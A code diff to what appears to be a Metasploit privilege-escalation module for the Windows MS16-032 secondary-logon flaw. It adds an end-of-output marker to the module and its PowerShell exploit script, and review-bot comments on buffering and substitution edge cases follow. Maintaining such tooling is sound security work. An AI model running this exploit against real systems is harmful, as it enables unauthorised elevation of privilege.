diff --git a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1 b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
index 1a495b993e..74be4b236f 100755
--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@@ -354,6 +354,7 @@
 $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
 $StartTokenRace.Stop()
 $SafeGuard.Stop()
+ echo "$end"
 Return
 }
diff --git a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
index 3dc3a190ea..dc9190c7f4 100644
--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -126,6 +126,8 @@ class MetasploitModule < Msf::Exploit::Local
 ms16_032.gsub!("$cmd","\"#{cmdstr}\"") #lpcommandLine - capped at 1024b
 ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
+ end_flag = Rex::Text.rand_text_alphanumeric(32)
+ ms16_032.gsub!("$end", end_flag)
 print_status('Compressing script contents...')
 ms16_032_c = compress_script(ms16_032)
@@ -160,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
 while(d = r.channel.read)
 print(d)
+ break if d.include? end_flag
 end
 r.channel.close
 r.close
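Review bot: The end-of-output marker is emitted on this one exit path only, immediately before `Return`, so the module's read loop that keys on it still has no bound whenever the script returns or throws anywhere else; unless every other exit of this function also prints the marker (the function starts outside this hunk, so I cannot confirm), the marker only helps on the success path. If the body can be wrapped, a `try { ... } finally { echo "$end" }` around the race logic would make it unconditional. `$end` is substituted textually by the module before upload; if the script is ever run unmodified, `"$end"` expands to an undefined variable and prints an empty line, which is harmless but deserves a comment such as `# $end is replaced by the module with a random end-of-output marker`.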
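Review bot: `ms16_032.gsub!("$end", end_flag)` replaces the literal `$end` everywhere in the script, including as the prefix of any longer PowerShell identifier such as `$endTime`, because a String pattern carries no word boundary; if the script declares such variables (not visible here) their names would be silently corrupted. Anchoring the placeholder avoids that: `ms16_032.gsub!(/\$end\b/, end_flag)`. The marker from `rand_text_alphanumeric` contains no backslash sequences, so using it as a Regexp replacement is safe. The enclosing method starts outside this hunk.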
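Review bot: `break if d.include? end_flag` tests only the chunk returned by the current `r.channel.read`, so a marker that straddles two reads is missed and the loop falls back to blocking until EOF, which is exactly the behaviour this change is meant to avoid. Checking an accumulated buffer fixes it: `buf = ''` before the loop, `buf << d` after `print(d)`, and `break if buf.include? end_flag`. The marker is also echoed to the console with the rest of the output; if that is unwanted, strip it before `print`. The enclosing method starts outside this hunk.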